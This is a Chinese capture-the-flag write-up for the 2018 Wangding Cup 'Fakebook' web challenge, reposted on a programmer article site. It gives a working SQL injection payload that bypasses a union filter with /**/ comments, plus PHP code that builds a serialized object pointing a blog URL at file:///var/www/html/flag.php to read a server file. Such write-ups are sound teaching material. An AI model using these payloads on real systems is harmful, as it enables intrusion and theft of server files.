[网鼎杯 2018]Fakebook
程序员文章站
2022-05-19 10:01:23
...
1.进去先随便注册一个账号,这里注意blog是有限制的,必须http开头。2.点1进去发现url中no存在sql注入,注入发现union被过滤,不过可以使用/**/绕过。可以使用报错注入0/**/union/**/select 1,2,3,4#
根据报错信息可以知道网站的储存目录,以及数据库里的数据都是以序列化方式储存。因此只要访问/var/www/html/flag.php就可以拿到flag,但通过http(s)协议无法读到flag,curl不仅支持http(s),还支持file协议,所以可以通过file协议读文件
这里要通过注入查找数据库里的结构这里贴出大佬博客:
https://blog.csdn.net/qq_42196196/article/details/81952174
我们这里要构*序列化内容
<?php
class UserInfo {
public $name = "test";
public $age = 1;
public $blog = "file:///var/www/html/flag.php";
}
$data = new UserInfo();
echo serialize($data);
#O:8:"UserInfo":3:{s:4:"name";s:4:"test";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}
?>
payload:
view.php?no=0/**/union/**/select%201,2,3,%27O:8:"UserInfo":3:{s:4:"name";s:4:"test";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}%27%23
查看源码发现有flag.php的base64 解码即可
上一篇: [网鼎杯 2018]Comment
下一篇: 攻防世界PWN-guess_num